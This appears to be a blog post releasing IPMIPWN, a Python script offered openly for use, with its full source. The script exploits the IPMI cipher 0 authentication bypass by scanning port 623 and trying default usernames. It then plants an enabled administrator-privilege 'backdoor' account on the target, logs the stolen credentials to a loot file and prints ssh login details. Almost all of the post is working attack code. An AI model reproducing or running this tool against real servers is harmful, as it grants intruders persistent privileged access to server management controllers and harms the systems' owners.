There are a few good tools out there (Metasploit) to help you find and identify the IPMI cipher 0 vulnerability, but because its relatively trivial to exploit I have seen nothing that helps you pwn it. While it is easy to exploit, I have found I keep having to brush up on commands and junk every time I come across it which is where my tools comes in.
has been tesed on Kali 2.0, Rolling & Ubuntu 14.04
My IPMIPWN tool does all the real work for you, it will attempt to exploit the cipher 0 vulnerability using a list of predefined default user accounts and setup an backdoor account with a semi-random username and random password. All successful backdoors are logged in loot.log. This tool works best on Kali, it does require you to have ipmiutils “apt-get install ipmitool” and NMAP installed. Enjoy.
Requirements:
+ nmap
+ ipmiutils “sudo apt-get install ipmitool”
Usage:
git clone https://github.com/AnarchyAngel/IPMIPWN && cd IPMIPWN python ipmipwn.py (ip address)
Script:
#!/usr/bin/python
import os, sys, commands, random, string, time
USERNAMES = ['root','admin','ADMIN', 'ROOT', 'Administrator', 'USERID', 'guest', 'itops.admin', 'ITOps.Admin']
def INIT(HOST, USERNAMES):
print "[*] Checking if "+HOST+" is up..."
ISON = ALIVECHECK(HOST)
if ISON == 0:
DEAD()
else:
print "[*] Checking for access..."
USER=FINDUSER(HOST, USERNAMES)
print "[*] We have access as "+USER+" :)"
BACKDOOR(USER, HOST)
def USAGE():
print "[-] IPMIPWN by Adam Espitia"
print "[-] aahideaway.blogspot.com"
print "[-] @anarchyang31"
print ""
print "[-] USAGE: python ipmipwn.py <IP>"
print ""
print "[-] IPMIPWN will attempt to setup a backdoor on IPMI servers"
print "[-] exploiting the authentication bypass via cipher 0 vuln."
def BACKDOOR(USER, HOST):
print "[*] Setting up backdoor..."
RAWDATA = commands.getstatusoutput("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user summary")
PDATA = str(RAWDATA).split("Enabled User Count :")
P2DATA = PDATA[1].split("\\n")
USERCOUNT = str(int(P2DATA[0].strip())+1)
USERNAME = "backdoor"+USERCOUNT
PW = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(14))
os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user set name "+USERCOUNT+" "+USERNAME)
os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user set password "+USERCOUNT+" "+PW)
os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user priv "+USERCOUNT+" 4")
os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user enable "+USERCOUNT)
os.popen('echo "'+HOST+':'+USERNAME+':'+PW+'" >> loot.log')
print "[*] Done, access system using ssh as follows:"
print "[*] ssh "+USERNAME+"@"+HOST
print "[*] The password is "+PW
print "[*] Enjoy!"
def ALIVECHECK(HOST):
OUTPUT = os.popen('nmap -sU -T5 --open -p 623 '+HOST).read()
PO = str(OUTPUT).find("open")
#print PO
if PO == -1:
return 0
else:
return 1
def FINDUSER(HOST, USERNAMES):
for USER in USERNAMES:
time.sleep(5)
print "[*] Trying "+USER+"..."
OUTPUT = commands.getstatusoutput('ipmitool -I lanplus -C 0 -U '+USER+' -P hacked -H '+HOST+' user list')
#print OUTPUT
if str(OUTPUT).find("Unable to establish IPMI") == -1:
return USER
FAIL()
def FAIL():
print "[!] Could not get access. :("
exit()
def DEAD():
print "[!] Host is not listening on port 623"
exit()
if len(sys.argv) == 1:
USAGE()
else:
INIT(sys.argv[1], USERNAMES)Source: https://github.com/AnarchyAngel